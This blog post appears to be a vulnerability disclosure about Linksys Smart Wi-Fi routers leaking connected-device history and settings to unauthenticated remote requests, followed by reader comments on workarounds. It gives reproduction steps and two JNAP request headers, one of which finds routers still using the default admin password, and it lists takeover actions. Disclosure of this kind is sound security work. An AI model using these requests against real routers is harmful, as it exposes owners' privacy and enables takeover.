Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw

Our honeypots frequently detect scans targeting various home automation protocol endpoints. Many of these attacks aim to exploit vulnerable consumer routers. Upon further investigation, we’ve discovered a persistent flaw affecting Linksys Smart Wi-Fi routers that allows unauthenticated remote access to sensitive information.

How can the vulnerability be exploited?

    1. Go to the Linksys Smart Wi-Fi router’s public IP address in your web browser
    2. Open the developer console (F12 key) and go to the Network tab
    3. Scroll down to JNAP (there’s multiple) and click to open it
Example vulnerable Linksys Smart Wi-Fi router
Example vulnerable Linksys Smart Wi-Fi EA7500 (AC1900) router

The leak can also be reproduced by sending a request to this JNAP endpoint:

X-JNAP-ACTION: http://cisco.com/jnap/devicelist/GetDevices

This sensitive information disclosure vulnerability requires no authentication and can be exploited by a remote attacker with little technical knowledge.

How many Linksys Smart Wi-Fi routers are vulnerable?

Using data provided by BinaryEdge, our scans have found 25,617 Linksys Smart Wi-Fi routers are currently leaking sensitive information to the public internet, including:

    • MAC address of every device that’s ever connected to it (full historical record, not just active devices)
    • Device name (such as “TROY-PC” or “Mat’s MacBook Pro”)
    • Operating system (such as “Windows 7” or “Android”)

In some cases additional metadata is logged such as device type, manufacturer, model number, and description – as seen in the example below.

Example metadata leaking by Linksys Smart Wi-Fi routers

Other sensitive information about the router such as the WAN settings, firewall status, firmware update settings, and DDNS settings are also leaked publicly.

What are the risks of leaking this information publicly?

A MAC address is a unique identifier for every networked device. Mobile devices, such as smartphones and laptops, share this identifier every time they connect to a wireless network. This creates a fingerprint that can be used to track that device’s movement across networks.

If a device’s name includes the full name of the owner, this flaw allows attackers to determine the identity of owner and geolocate them via the Linksys Smart Wi-Fi router’s public IP address.

While geolocation by IP address is not precise, services like WiGLE allow anyone to get the exact geographical coordinates of a WiFi network based solely on its MAC address or SSID. An attacker can query the target Linksys Smart Wi-Fi router, get it’s MAC address, and immediately geolocate it.

In any scenario, publicly leaking the historical record of every device that’s ever connected to the Linksys Smart Wi-Fi router is a privacy concern that shouldn’t be taken lightly. This information allows attackers to gain visibility inside your home or business network, enabling them to conduct targeted attacks.

Is there any connection to the ShadowHammer attacks?

Of the 756,565 unique MAC addresses currently being leaked, only two were referenced in the ShadowHammer attacks. However, it’s not likely either were targeted directly. The first match, 0c:5b:8f:27:9a:64, appears to be frequently reused by Huawei. The second was the VMware default (00:50:56:c0:00:08) and was targeted only if it paired with a secondary MAC address.

Did you find the German mail bomber?

The MAC address used by the German mail bomber (f8:e0:79:af:57:eb) was not found.

What is Home Network Administration Protocol (HNAP)?

HNAP is a SOAP-based protocol used to manage and configure consumer routers. Cisco acquired and took over development of the protocol in 2009. Numerous HNAP-related vulnerabilities have been identified in the last six years. Large-scale exploitation of HNAP flaws by “TheMoon” botnet was discovered by security researchers in 2014.

Are there other HNAP vulnerabilities?

Yes, an unauthenticated attacker can quickly enumerate which Linksys Smart Wi-Fi routers have not changed the default password (admin) without even attempting to login to the device. The can be done by simply querying the following JNAP endpoint:

X-JNAP-ACTION: http://cisco.com/jnap/core/IsAdminPasswordDefault

Our scans have found thousands of routers are still using the default password and are vulnerable to immediate takeover – if they aren’t already compromised.

Admin access to the Linksys Smart Wi-Fi router allows attackers to:

    • Obtain the SSID and Wi-Fi password in plaintext
    • Change the DNS settings to use a rogue DNS server to hijack web traffic
    • Open ports in the router’s firewall to directly target devices behind the routers (example: 3389/tcp for Windows RDP)
    • Use UPnP to redirect outgoing traffic to the threat actors’ device
    • Create an OpenVPN account (supported models) to route malicious traffic through the router
    • Disable the router’s internet connection or modify other settings in a destructive manner

What specific models of Linksys Smart Wi-Fi routers are vulnerable?

Our research has found the models listed below are actively leaking sensitive information, including those running the latest firmware available from Linksys.

Vulnerable Linksys Smart Wi-Fi router model numbers

The full list of vulnerable models and firmware versions is available here.

Where are the vulnerable routers located?

This interactive map shows the total vulnerable Linksys Smart Wi-Fi routers found per country.

Vulnerable Linksys Smart Wi-Fi routers by country
Of the vulnerable routers found, most were located in the United States.

Overall, a grand total of 25,617 vulnerable routers were found in 146 countries and on the network of 1,998 unique autonomous systems (internet service providers).

Wasn’t this issue patched five years ago?

While CVE-2014-8244 was supposedly patched for this issue, our findings have indicated otherwise. Upon contacting the Linksys security team (security@linksys.com) we were advised to report the vulnerability via this form. After submitting our findings, the reviewing analyst determined the issue was “Not applicable / Won’t fix” and subsequently closed.

Is there any good news?

Over half of the vulnerable Linksys Smart Wi-Fi routers (14,387) currently have automatic firmware updates enabled. If Linksys eventually patches this vulnerability, these routers will be protected automatically.

Closing remarks

Due to the sensitive nature of this vulnerability, the IP addresses of the affected Linksys Smart Wi-Fi routers will not be published publicly.

Unfortunately, our typical recommendation of keeping your router’s firmware up-to-date is not applicable in this case as no fix is available. Linksys Smart Wi-Fi routers have remote access enabled by default, as it’s required for the Linksys App to function, and cannot be turned off as a workaround. However, most (but not all) models have the option of using third-party firmware, such as OpenWrt, that can disable remote access and prevent the leak of sensitive information.

Follow us on Twitter for latest emerging threats and botnet trends.

15 thoughts on “Over 25,000 Linksys Smart Wi-Fi routers vulnerable to sensitive information disclosure flaw”

    • Thanks for the suggestion. While it’s not available for all Linksys models impacted, it does offer a great workaround to stop the leak.

  1. Are the WRT* models vulnerable if they have been flashed with OpenWRT/LEDE firmware? This could be a workaround for users with those devices, until an official updated firmware is released.

  2. So, I just contacted Linksys support, and they simply advised me to not let people I don’t trust to connect to my Wi-Fi. However, it sounds like the vulnerability allows the hacker to access the sensitive data remotely. Can anything substantial be done to secure my router without installing OpenWRT firmware? I am afraid of bricking the device. I’ve had a custom admin password on it since the purchase.

    • @Serge: I have today installed OpenWRT on a WRT3200ACM model. Since this model has dual firmware support, when I did so it simply burned it to the alternate block and marked it as the bootable one; the original Linksys firmware is still fully intact in the other block. I quickly discovered that there is an extra package for the LuCI UI, luci-app-advanced-reboot, that can be installed which adds an Advanced Reboot section to System that allows quickly rebooting to either firmware block!

      If you also have a WRT3200ACM or one of the other Linksys models with dual firmware blocks, you might not be able to make a mess of it even if you try.

      • @VulcanTourist, I am using the EA6350. There is only a snapshot release for it, but I guess I can follow the debrick procedure if mess something up.

  3. Another temporary “workaround” would be to put something more secure between the Linksys router and the internet. Either a pure firewall or some router with firewall capabilities.

  4. I litterally just discovered this myself than ironically Google refered me to this in the news.

  5. I see: “The routers have remote access enabled by default and can’t be turned off as a workaround, because it’s required for an accompanying Linksys App to function.”.

    This doesn’t seem fully accurate because one of the first configuration steps I took when I got my WRT1900ACS was to disable Remote Access under Connectivity->Administration (to see that parameter you have to login to the router using a Linksys Smart-WiFi account instead of the local access method). I do not use the Linksys app on my phone so I have not noticed any loss of function on the router.

    Does anyone know if disabling Remote Access thwarts the data leak?

  6. @Serge: I have today installed OpenWRT on a WRT3200ACM model. Since this model has dual firmware support, when I did so it simply burned it to the alternate block and marked it as the bootable one; the original Linksys firmware is still fully intact in the other block. I quickly discovered that there is an extra package for the LuCI UI, luci-app-advanced-reboot, that can be installed which adds an Advanced Reboot section to System that allows quickly rebooting to either firmware block!

    If you also have a WRT3200ACM or one of the other Linksys models with dual firmware blocks, you might not be able to make a mess of it even if you try.

  7. Just found out my router is affected. Another workaround is to enable a port forwarding from the 80 port to an non-existent internal IP/port combination. That way, the public webpage will show a “can’t connect” message, yet the administration site on the internal gateway IP still works.

  8. I recently purchased an EA8300 (refurb), which you list as a model that leaks info, causing me no small amount of concern. So, I ran the bash script against my pubilc IP from within my home network and it reported everything. But, I can’t access the router’s web page from an external network via port 80, 10000, or 10080. I checked my ports using Gibson Research’s ShieldsUP! tool, there are no open ports. I then ran the jnapsiph.sh script from an external network, it reported nothing.
    If there is truly a leak of information, then it is likely due to security issues on the server side (the Linksys/Cisco JNAP URLs), and/or with the Android app, not the router itself. Perhaps it shows up if you download the app and use it to access your router remotely? I’m not testing that…

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: